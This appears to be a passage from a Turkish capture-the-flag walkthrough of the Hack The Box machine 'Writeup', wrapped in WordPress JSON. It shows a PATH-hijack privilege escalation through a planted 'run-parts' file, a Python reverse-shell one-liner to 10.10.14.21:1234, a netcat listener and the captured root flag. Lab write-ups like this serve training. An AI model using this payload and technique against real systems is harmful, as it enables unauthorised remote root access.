\/usr\/local\/bin\njkr@writeup:\/usr\/local\/bin$ touch run-parts\njkr@writeup:\/usr\/local\/bin$ nano run-parts\njkr@writeup:\/usr\/local\/bin$ cat run-parts\npython -c &#039;import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.10.14.21&quot;,1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(&quot;\/bin\/sh&quot;)&#039;\n\njkr@writeup:\/usr\/local\/bin$ chmod 777 run-parts\n<\/code><\/pre>\n<p>Makineye tekrardan ssh ile ba\u011flanmay\u0131 denedi\u011fimde:<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~]\n\u2514\u2500# ssh jkr@10.10.10.138\njkr@10.10.10.138&#039;s password: \n<\/code><\/pre>\n<p>1324 portuma reverse geliyor.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/opt]\n\u2514\u2500# nc -lvp 1234\nlistening on [any] 1234 ...\nconnect to [10.10.14.21] from writeup.htb [10.10.10.138] 52400\n# id\nid\nuid=0(root) gid=0(root) groups=0(root)\n# cd \/root\ncd \/root\n# ls\nls\nbin  root.txt\n# cat root.txt\ncat root.txt\n5fd505e0c8af615cf7f6c36d60ee5276\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Makine Ad\u0131 Seviye OS Logo Writeup &#8211; HTB Orta Linux Walkthrough nmap taramas\u0131: \u250c\u2500\u2500(root&#x1f480;kali)-[~] \u2514\u2500# nmap -p- -A -T4 10.10.10.138 Starting Nmap 7.91 ( https:\/\/nmap.org&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/10\/04\/writeup\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">Writeup<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[],"class_list":["post-1581","post","type-post","status-publish","format-standard","hentry","category-walkthrough","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1581","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1581"}],"version-history":[{"count":2,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1581\/revisions"}],"predecessor-version":[{"id":1583,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1581\/revisions\/1583"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1581"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1581"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1581"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}